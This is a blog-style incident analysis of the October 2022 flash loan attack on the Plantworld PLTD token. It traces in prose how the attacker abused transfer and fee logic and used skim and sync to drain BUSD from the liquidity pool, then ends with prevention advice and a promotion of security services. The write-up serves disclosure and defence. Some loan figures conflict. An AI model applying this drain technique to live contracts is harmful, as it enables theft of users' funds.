3 min read

Plantworld’s Flash Loan Attack Analysis Report

On October 18, 2022, Plantworld $PLTD became the latest victim of a flash loan attack, due…

Plantworld Vulnerability

TL;DR#

On October 18, 2022, Plantworld $PLTD became the latest victim of a flash loan attack, due to a flaw in transfer logic, resulting in a profit of 24,475 $BUSD for the hacker.

Introduction to Plantworld#

Plantworld PLTD, a token operating on Binance Smart Chain (BSC) BEP-20, is a Plants-themed Blockchain game.

Vulnerability Assessment#

The primary cause of this vulnerability is the hackers' ability to use a flash loan to reduce the balance of the PLTD contract in Cake-LP to 1 and then use the $PLTD tokens to swap all of the $BUSD into the attack contract.

Steps#

  1. The attacker address can be found here , alongside the attack transaction .

  2. The hacker sent out two flash loan requests in order to withdraw 660,000 $BUSD.

  1. The attacker then exchanged all 666,00 $BUSD for about 1.57 million $PLTD tokens.
  1. At this moment, the alleged hacker owned a significant amount of PLTD tokens, which will be utilized to manipulate the balance of PLTD token in Cake-LP.

  2. As a pre-attack check, the attacker queries the current bron value and the PLTD balance of the Cake-LP.

  3. The attacker sends 116,000 $PLTD tokens directly to Cake-LP, which is precisely double the $PLTD token balance in Cake-LP from the previous step minus one.

  1. When they call the Transfer function, the request is forwarded to the _transfer function. In this instance, the from address is the attack contract, takeFee is set to true, and the _tokenTransferSell function is then invoked.

  2. In the subsequent _tokenTransferSell function, the _bron parameter is set to half the transfer's number, which is equal to the Cake-LP balance minus 1.

  1. The attacker utilizes skim to retrieve the PLTD previously transferred. If the from address is uniswapV2Pair in the _transfer function, _tokenTransferBuy is called.
  1. After _bron is initialized to the balance of Cake-LP minus 1, it further reduces the balance of Cake-LP to 1, and then calls the sync function of Cake-LP to synchronize the balance to reserve.
  1. The attacker then exchanged all $PLTD tokens for $BUSD, nearly depleting the BUSD balance of Cake-LP.

Aftermath#

The perpetrator obtained 690,000 $BUSD and repaid the 666,00 $BUSD acquired from the loan. The remaining profit of approximately 24,475 $BUSD is sent to this address .

How to prevent such an attack vector#

The absence of a protocol security audit can have catastrophic consequences for any crypto-native project. It is essential that the codebase be subjected to stringent auditing procedures to protect against such incidents to a greater extent.

It is also critical that the token balance of a directly operating pair in the same token contract be removed in the first place.

Protocol, and Platform Security#

Our security team at Neptune Mutual can validate your platform for DNS and web-based security, smart contract reviews, as well as frontend and backend security. We can offer you a solution to scan your platform and safeguard your protocol for known and unknown vulnerabilities that have the potential to have catastrophic long-term effects. Contact us on social media if you are serious about security and have the budget, desire, and feeling of responsibility to do so.


About Us#

Neptune Mutual project safeguards the Ethereum community from cyber threats. The protocol uses parametric cover as opposed to discretionary insurance. It has an easy and reliable on-chain claim process. This means that when incidents are confirmed by our community, resolution is fast.

Join us in our mission to cover, protect, and secure on-chain digital assets.

Official Website: https://neptunemutual.com
Blog: https://blog.neptunemutual.com/
Twitter: https://twitter.com/neptunemutual
Reddit: https://www.reddit.com/r/NeptuneMutual
Telegram: https://t.me/neptunemutual
Discord: https://discord.gg/2qMGTtJtnW
YouTube: https://www.youtube.com/c/NeptuneMutual
LinkedIn: https://www.linkedin.com/company/neptune-mutual

By